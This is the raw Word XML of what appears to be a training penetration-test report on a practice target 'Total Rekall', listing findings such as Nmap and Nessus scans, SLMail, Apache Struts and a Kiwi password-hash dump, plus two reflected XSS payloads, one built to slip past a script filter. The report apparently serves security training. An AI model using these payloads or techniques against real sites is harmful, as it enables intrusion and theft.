                <w:b w:val="1"/>
                <w:color w:val="008000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag3 SSL and CRT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag4 Nmap Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">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0EF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag5 Aggressive Nmap Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag6 Nessus Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">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F3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag7 Apache Struts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">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F5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>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F7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows Servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff0000"/>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F9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag1 Unprotected User Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="008000"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag2 Nmap Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">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0FD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag3  FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">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0FF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag4 SLMail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">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101">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag5 Task Scheduler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">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103">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag6 Password Hash- Kiwi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">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105">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Flag7 Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">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107">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pP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0C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>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0D">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0E">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0F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Totalrekall.xyz</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.10</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.11</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.12</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.14</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.13.13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">172.22.117.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="532" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">110</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4444</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t xml:space="preserve">Windows</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">21</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">53</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">110</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">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25">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26">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27">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff9900"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="ff9900"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="390" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="360" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_904dkskwlg44" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Findings Day 1</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rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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5">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Cross Site Scripting XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">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39">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3B">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As I navigated to the website 192.168.14.35, I went to the welcome page and in “entering your name below” I entered the reflected XSS as &lt;script&gt;alert(hi hacker)&lt;/script&gt;. This script tells the browser “this is JavaScript” with a pop up message box.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">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drawing>
                <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                  <wp:extent cx="4657725" cy="2578100"/>
                  <wp:effectExtent b="0" l="0" r="0" t="0"/>
                  <wp:docPr id="3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657725" cy="2578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F">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Welcome.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation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Output Encoder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">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b w:val="1"/>
                <w:color w:val="ffffff"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability 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6">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color w:val="1f2328"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross Site Scripting XSS #2</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8">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4A">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4C">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As I continued to navigate through totalrekall.xyz I went to the VR Planner page. From there I entered the script &lt;</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SCRIPscriptT</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;alert("hi")&lt;/SCRIPscripTt&gt;). This script can bypass the </w:t>
            </w:r>
